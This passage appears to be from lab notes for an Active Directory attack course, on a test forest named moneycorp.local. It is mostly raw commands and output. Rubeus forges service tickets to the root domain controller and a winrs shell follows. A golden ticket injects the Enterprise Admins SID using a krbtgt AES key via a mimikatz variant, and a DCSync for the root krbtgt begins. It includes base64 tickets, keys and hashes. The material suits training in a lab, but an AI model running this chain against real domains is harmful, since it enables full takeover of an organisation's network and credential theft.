eXQedsvKBfKNvNXpj2ZMSvtr/Q2u2clZgaFeI078XO6A2V4XKCzSPEsYbEFGYZm+NGGrnnMwcJCRNL8vDaCQ3AeMuVQf6qAJ7
CxriVS9LTaBkQ4E4ApXTBONitEkTRkVOoGSv7uabxbs+emq9Q78ouojLIuu0z2EhgUf6c0YPbzaLHaWorGnnpVyLQNJ6Um0uJ
P+k7JRuNNxOaV6C4nIQljsk9goxIAi2sZzUYdBn3y5NzpINmF07kGw8Ohjt3uTxeCVNTY9famCXTlRqYEmiVOCdgVCZku3DK0
Ea5AoJj+J6r2niO4LmmIN90Mo3OvcnrAwQdIAHaSA+keR+bPaIyZ4QBeTesqyP0U7/sGdMlUkNl5KAyFXrV3p1r09Cc3hgGtM
DncaVWf1pbyn68hHMjp8sSDy/TGby7+5qnJFvxJNl2T1Ej+SVu3wvhjdj6jTS6ZTLaTODpPsgJtHPQZSBsW1rT1Ja9at6mzE3
l2Nk1ZW+kDzY7ZKL3p2wgqhER8QQGB4GMo5sGiUaMxx7FQ0pQICgZg78/GbbsELDWGGA1ska1KyyRkLzmGSFiPp0dPk0lNgG9
8t3Dus/0RQpER4VbLUD/7ce1j10v4g6+UAQaSIqemT0tfnE8Mikge3EckVD3naxXACocIwHg60FL6Hk5jNVlfVSu5EFOlFli5
JOl7yu5rFda6OCAR4wggEaoAMCAQCiggERBIIBDX2CAQkwggEFoIIBATCB/jCB+6AbMBmgAwIBF6ESBBCDcd1aAZC6JK9PtVu
VO/XioRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMohowGKADAgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQKAAAKQR
GA8yMDI0MDcwNDE3MzMyMVqlERgPMjAyNDA3MDQxNzMzMjFaphEYDzIwMjQwNzA1MDMzMzIxWqcRGA8yMDI0MDcxMTE3MzMyM
VqoHBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUypLzAtoAMCAQKhJjAkGwZrcmJ0Z3QbGkRPTExBUkNPUlAuTU9ORVlDT1
JQLkxPQ0FM /service:host/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGS

[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'host/mcorp-dc.moneycorp.local'
[*] Using domain controller: mcorp-dc.moneycorp.local (172.16.1.1)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):
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

ServiceName : host/mcorp-dc.moneycorp.local
ServiceRealm : MONEYCORP.LOCAL
UserName : Administrator
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 7/4/2024 10:36:26 AM
EndTime : 7/4/2024 8:33:21 PM
RenewTill : 7/11/2024 10:33:21 AM
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable,
forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : LpRfzu3av43pFvDrFpaot/c6AkDWUmiLRMJwmIPp+Hs=

C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgs
/ticket:doIGPjCCBjqgAwIBBaEDAgEWooIFCjCCBQZhggUCMIIE/qADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ
0FMoi8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKOCBKYwggSioAMCARehAwIBA6KCBJ
QEggSQsTmYQYF3V25z3NMU3E+6o9jfABYQ8cEmNW3js6KS4EXzULpR5xlokVpHbCxwBapPL6qqLRgLnOmLjuo7wXnv2a8kBEv
YzbZ5nLFgXUK8crz9fBV557iK5pM2/rH70WU5ywoSKZ4T8s1PFKH+9+yN2IpVXeQQ6tARrvPfnnalrQOEhpGetwP6qKnP6w5p
oiSNeaDtG2SWn/Zv65x92QLZYAV8gltaVErY19jQcLrXthDVBGhywbe2WoqqGrh3k+OFXd1MjVhh1Jnjs0tWNwPZRAayKHgny
dchvm0jcNeP2ComUeXwXMpFGS0/ftaQbpJX4X24CNKcipWPPlSmhnwSGydKiAII7AHB9DLfj2MBKCNNnkNRfgtOnS70hAoLlK
ADBpWnpVsleuUppKmAATMaBYxyxOrEnH3G92mEeEUFer32Oz6+R7Leh6kSnneRlhP1VfOlh/pRpBzzAx+zb94uafWIEYzK192
qUcofrngVSf37yUwNejUNTUwVu03FLiO39A5C+JgR19MFMKqxnpnCk1pL5OGOHJWpF7WkXHklCqtDnk5PfwkqXS4SXlgTLGGE
VveFyB7q2aCOnlLvZDxwGCH1bYvLgly4QR8BNeaeXwjeD/u+8AS3D++FgRoZklOVIUsXietZv+010ItHRDyg3Gsn3m2ibN6/i
AaQE18sCv1DoagOM6/Tb5RaHZeyJNvZ9pHb4z3Y273P2WXVVfyuYEI4SPUvG+Vfo/KrC3XIR95+G5AOB1OPDDaLT+040yAFr3
fOt1Jju5r1fDQvIK4k0TIKTnV1cqJ5Bl/GTiyELlKpPGGe98h3Twfk1EKtA5v6PMVhyxpiBrbf7UWAarpRTOP3iJzGffpDnvK
eXQedsvKBfKNvNXpj2ZMSvtr/Q2u2clZgaFeI078XO6A2V4XKCzSPEsYbEFGYZm+NGGrnnMwcJCRNL8vDaCQ3AeMuVQf6qAJ7
CxriVS9LTaBkQ4E4ApXTBONitEkTRkVOoGSv7uabxbs+emq9Q78ouojLIuu0z2EhgUf6c0YPbzaLHaWorGnnpVyLQNJ6Um0uJ
P+k7JRuNNxOaV6C4nIQljsk9goxIAi2sZzUYdBn3y5NzpINmF07kGw8Ohjt3uTxeCVNTY9famCXTlRqYEmiVOCdgVCZku3DK0
Ea5AoJj+J6r2niO4LmmIN90Mo3OvcnrAwQdIAHaSA+keR+bPaIyZ4QBeTesqyP0U7/sGdMlUkNl5KAyFXrV3p1r09Cc3hgGtM
DncaVWf1pbyn68hHMjp8sSDy/TGby7+5qnJFvxJNl2T1Ej+SVu3wvhjdj6jTS6ZTLaTODpPsgJtHPQZSBsW1rT1Ja9at6mzE3
l2Nk1ZW+kDzY7ZKL3p2wgqhER8QQGB4GMo5sGiUaMxx7FQ0pQICgZg78/GbbsELDWGGA1ska1KyyRkLzmGSFiPp0dPk0lNgG9
8t3Dus/0RQpER4VbLUD/7ce1j10v4g6+UAQaSIqemT0tfnE8Mikge3EckVD3naxXACocIwHg60FL6Hk5jNVlfVSu5EFOlFli5
JOl7yu5rFda6OCAR4wggEaoAMCAQCiggERBIIBDX2CAQkwggEFoIIBATCB/jCB+6AbMBmgAwIBF6ESBBCDcd1aAZC6JK9PtVu
VO/XioRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMohowGKADAgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQKAAAKQR
GA8yMDI0MDcwNDE3MzMyMVqlERgPMjAyNDA3MDQxNzMzMjFaphEYDzIwMjQwNzA1MDMzMzIxWqcRGA8yMDI0MDcxMTE3MzMyM
VqoHBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUypLzAtoAMCAQKhJjAkGwZrcmJ0Z3QbGkRPTExBUkNPUlAuTU9ORVlDT1
JQLkxPQ0FM /service:rpcss/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGS

[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'rpcss/mcorp-dc.moneycorp.local'
[*] Using domain controller: mcorp-dc.moneycorp.local (172.16.1.1)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):

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

ServiceName : rpcss/mcorp-dc.moneycorp.local
ServiceRealm : MONEYCORP.LOCAL
UserName : Administrator
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 7/4/2024 10:36:50 AM
EndTime : 7/4/2024 8:33:21 PM
RenewTill : 7/11/2024 10:33:21 AM
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable,
forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : PfsKCylqBH69NmHEJTpbi8nOtPpH4jA6dgwbVXeukKM=

C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgs
/ticket:doIGPjCCBjqgAwIBBaEDAgEWooIFCjCCBQZhggUCMIIE/qADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ
0FMoi8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKOCBKYwggSioAMCARehAwIBA6KCBJ
QEggSQsTmYQYF3V25z3NMU3E+6o9jfABYQ8cEmNW3js6KS4EXzULpR5xlokVpHbCxwBapPL6qqLRgLnOmLjuo7wXnv2a8kBEv
YzbZ5nLFgXUK8crz9fBV557iK5pM2/rH70WU5ywoSKZ4T8s1PFKH+9+yN2IpVXeQQ6tARrvPfnnalrQOEhpGetwP6qKnP6w5p
oiSNeaDtG2SWn/Zv65x92QLZYAV8gltaVErY19jQcLrXthDVBGhywbe2WoqqGrh3k+OFXd1MjVhh1Jnjs0tWNwPZRAayKHgny
dchvm0jcNeP2ComUeXwXMpFGS0/ftaQbpJX4X24CNKcipWPPlSmhnwSGydKiAII7AHB9DLfj2MBKCNNnkNRfgtOnS70hAoLlK
ADBpWnpVsleuUppKmAATMaBYxyxOrEnH3G92mEeEUFer32Oz6+R7Leh6kSnneRlhP1VfOlh/pRpBzzAx+zb94uafWIEYzK192
qUcofrngVSf37yUwNejUNTUwVu03FLiO39A5C+JgR19MFMKqxnpnCk1pL5OGOHJWpF7WkXHklCqtDnk5PfwkqXS4SXlgTLGGE
VveFyB7q2aCOnlLvZDxwGCH1bYvLgly4QR8BNeaeXwjeD/u+8AS3D++FgRoZklOVIUsXietZv+010ItHRDyg3Gsn3m2ibN6/i
AaQE18sCv1DoagOM6/Tb5RaHZeyJNvZ9pHb4z3Y273P2WXVVfyuYEI4SPUvG+Vfo/KrC3XIR95+G5AOB1OPDDaLT+040yAFr3
fOt1Jju5r1fDQvIK4k0TIKTnV1cqJ5Bl/GTiyELlKpPGGe98h3Twfk1EKtA5v6PMVhyxpiBrbf7UWAarpRTOP3iJzGffpDnvK
eXQedsvKBfKNvNXpj2ZMSvtr/Q2u2clZgaFeI078XO6A2V4XKCzSPEsYbEFGYZm+NGGrnnMwcJCRNL8vDaCQ3AeMuVQf6qAJ7
CxriVS9LTaBkQ4E4ApXTBONitEkTRkVOoGSv7uabxbs+emq9Q78ouojLIuu0z2EhgUf6c0YPbzaLHaWorGnnpVyLQNJ6Um0uJ
P+k7JRuNNxOaV6C4nIQljsk9goxIAi2sZzUYdBn3y5NzpINmF07kGw8Ohjt3uTxeCVNTY9famCXTlRqYEmiVOCdgVCZku3DK0
Ea5AoJj+J6r2niO4LmmIN90Mo3OvcnrAwQdIAHaSA+keR+bPaIyZ4QBeTesqyP0U7/sGdMlUkNl5KAyFXrV3p1r09Cc3hgGtM
DncaVWf1pbyn68hHMjp8sSDy/TGby7+5qnJFvxJNl2T1Ej+SVu3wvhjdj6jTS6ZTLaTODpPsgJtHPQZSBsW1rT1Ja9at6mzE3
l2Nk1ZW+kDzY7ZKL3p2wgqhER8QQGB4GMo5sGiUaMxx7FQ0pQICgZg78/GbbsELDWGGA1ska1KyyRkLzmGSFiPp0dPk0lNgG9
8t3Dus/0RQpER4VbLUD/7ce1j10v4g6+UAQaSIqemT0tfnE8Mikge3EckVD3naxXACocIwHg60FL6Hk5jNVlfVSu5EFOlFli5
JOl7yu5rFda6OCAR4wggEaoAMCAQCiggERBIIBDX2CAQkwggEFoIIBATCB/jCB+6AbMBmgAwIBF6ESBBCDcd1aAZC6JK9PtVu
VO/XioRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMohowGKADAgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQKAAAKQR
GA8yMDI0MDcwNDE3MzMyMVqlERgPMjAyNDA3MDQxNzMzMjFaphEYDzIwMjQwNzA1MDMzMzIxWqcRGA8yMDI0MDcxMTE3MzMyM
VqoHBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUypLzAtoAMCAQKhJjAkGwZrcmJ0Z3QbGkRPTExBUkNPUlAuTU9ORVlDT1
JQLkxPQ0FM /service:http/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGS

[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'http/mcorp-dc.moneycorp.local'
[*] Using domain controller: mcorp-dc.moneycorp.local (172.16.1.1)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):

doIGNDCCBjCgAwIBBaEDAgEWooIFFzCCBRNhggUPMIIFC6ADAgEFoREbD01PTkVZQ09SUC5MT0NBTKIr
MCmgAwIBAqEiMCAbBGh0dHAbGG1jb3JwLWRjLm1vbmV5Y29ycC5sb2NhbKOCBMIwggS+oAMCARKhAwIB
DqKCBLAEggSslkwtGNWCSP+CGlGCjptIzw5ipNLDkLtoo7D65Ie4ljhDRHaZ31mzENDDviVxGMV5g9H8
xBEWEUwiqboIa6RCj/D0kcj1amReYDApRWOKKkixZ2B735fdqc8tQc7YvFRBVFSZCqoX2RjSeHNyIvIv
XJdQhVStbTdcn5Cnbxi3Trz+heHFtbkjBdXFipuGBvQJ6f88DED/A0c3ywwU7H5xIWpb/yxlBSxX4Hk8
ZC0r4LPXdEAFG0+sOwVLWlfdeUKxoVRdl2zmy9HAUac9WdYVYHaWlnWh7e9EVCzVQJKUqJ8rma/A51U5
kYGSGyGQAUbxUsv8jDUxiB6pOURyxQ+Bdq85SvtoM9EwDUAE6EGzvd6TdQHoNOr0wy/5aeCrx98/IlbD
kWeCi0Zz70I7LoROYjJqoSVj+Gh6lUKdwpKJvupblEnnOaQMGYKoUtu2grODLcKjVTPtfUAtFDh1clXU
Q6eaFbJawG8eUrCXkBj+ZAOLZDS1LE6Ml8fj1Kj+y3QYPMCR38RH0l4dOL7i4/LahwSJaXHUaHk4wAZF
/B8y7nGWcDpebxnTDNe3ZbxYd8qvc2IGe5rVIXuKw8UkFdNDUZRGY4DYncjU3d+m3V+JnMXPkj+Yy5UC
eiIimmZL9oC//OFlWlfHtwkHoUEGiid95cB6/5SqEEkIqxiPEb1HWuuc8MxrOEg12vE0ORC2xGhJzgGp
cfj+20/0UMBoOmLH1sGAKH6o1b9+YZodVj5Xpmo3MLGEwYCyKWAMHf+G21IheOmCboqlHwb/0BSqO1t8
IIvojaYsjQNf/nES8mPd/nGjQl1XBm715vf12K36GR1I+u3TPl0M0/9Mv5MIaUM7zgJmy82MhFIoF9ZJ
7Pb2mLSx52vVhT0A9SpL7KtsEq9N3bCAr0OAaDqFE1TtCbR3jXKMu3XgCPixx+QfB3eUwgDv2yuTN6Hq
eHbaO1v68CysuAniQubnAWH85uaE00vkSsIMVmOLRUO1HfLnH9yYOr9/byjdD5lkCjNcVU7KGDuzE1rF
n5UnorGZcWijixNUCjW9efoWAbAaJk4+CI16qfZCfLovVT37ZYKWSkhnj58q9SqhJPs5i36db9uXcHze
XyxKZBlY6nUaL0fP8u8+y1hem+yzbU7XLapeQCbCsln/Q9/GTeE1yxSlPD5ObcAdvBx01jFmd/pqiQ0+
LhzuxitgAwbHq4ISwFemakBV0a8MtiCFVH7g89Ubt80N7V6H/6eTRG21mZWubYBYcYeSsOt4qitmWo34
2y0zoXC+vwq7oi1PH+3NZXbRhgPdrnF4zAz2VRACIE9cseVfcjJouc9J1SX4RJsn+hcBa/fHcqoYzvia
uMGhO8NxA/rJ9XAl0NeKDidPxwz1wIp9i8FfkRSZGAEUVS2csaItlU8EjyDR1AHXP7+Eja37Tf2EcbPk
Rm7fy8MashccToVJ2ozrue+4CCUzB/n7XNLX7ILr6pexVH1g3N9pVsB+wIfhDf4boYEcnEaW/ywD89DO
3LiTskT3ECClM/ZplAv3LbCKov8yNSxqa6Ps6htFJVTlctr/Sp2zOXB2zeGgM0JD26ksqaYTkq3p3wUR
0Aj1sL6jggEHMIIBA6ADAgEAooH7BIH4fYH1MIHyoIHvMIHsMIHpoCswKaADAgESoSIEIN/Py7nkfnKz
9whW386huCMDK4FIG3A+W/wwuJNNlujhoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMohowGKAD
AgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQKUAAKURGA8yMDI0MDcwNDE3MzcxMVqmERgPMjAyNDA3
MDUwMzMzMjFapxEYDzIwMjQwNzExMTczMzIxWqgRGw9NT05FWUNPUlAuTE9DQUypKzApoAMCAQKhIjAg
GwRodHRwGxhtY29ycC1kYy5tb25leWNvcnAubG9jYWw=

ServiceName : http/mcorp-dc.moneycorp.local
ServiceRealm : MONEYCORP.LOCAL
UserName : Administrator
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 7/4/2024 10:37:11 AM
EndTime : 7/4/2024 8:33:21 PM
RenewTill : 7/11/2024 10:33:21 AM
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable,
forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : 38/LueR+crP3CFbfzqG4IwMrgUgbcD5b/DC4k02W6OE=

C:\Windows\system32>winrs -r:mcorp-dc.moneycorp.local cmd.exe


Microsoft Windows [Version 10.0.20348.2227]
(c) Microsoft Corporation. All rights reserved.

C:\Users\Administrator.dcorp>set username
set username
USERNAME=Administrator

C:\Users\Administrator.dcorp>set computername
set computername
COMPUTERNAME=MCORP-DC

C:\Users\Administrator.dcorp>whoami
whoami
dcorp\administrator

Privilege escalation to Enterprise Admins using krbtgt

Here we inject the SID of the forest's Enterprise Admins group (RID 519 in the root domain) into the SID History of the child domain's domain administrator. For this we need the krbtgt hash of the child domain and the domain SIDs of both the child and the root domain.

Using BetterSafetyKatz.exe
C:\Windows\system32>C:\AD\Tools\old_tools\BetterSafetyKatz.exe "kerberos::golden
/user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-
3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519
/aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /ptt" "exit"
[+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and @Mrtn9
[+] Randomizing strings in memory
[+] Suicide burn before CreateThread!

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local
/sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519
/aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /ptt
User : Administrator
Domain : dollarcorp.moneycorp.local (DOLLARCORP)
SID : S-1-5-21-719815819-3726368948-3917688648
User Id : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-335606122-960912869-3279953914-519 ;
ServiceKey: 154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 - aes256_hmac
Lifetime : 7/4/2024 11:00:40 AM ; 7/2/2034 11:00:40 AM ; 7/2/2034 11:00:40 AM
-> Ticket : ** Pass The Ticket **

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Golden ticket for 'Administrator @ dollarcorp.moneycorp.local' successfully submitted for current session

mimikatz(commandline) # exit
Bye!

C:\Windows\system32>klist

Current LogonId is 0:0x16159e5

Cached Tickets: (1)

#0> Client: Administrator @ dollarcorp.moneycorp.local
Server: krbtgt/dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 7/4/2024 11:00:40 (local)
End Time: 7/2/2034 11:00:40 (local)
Renew Time: 7/2/2034 11:00:40 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called:

Now we run a DCSync attack against the forest root's domain controller to obtain the hashes of the forest root's krbtgt account.
C:\Windows\system32>"C:\AD\Tools\Old_Tools\SafetyKatz.exe" "lsadump::dcsync /user:mcorp\krbtgt
/domain:moneycorp.local" "exit"

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
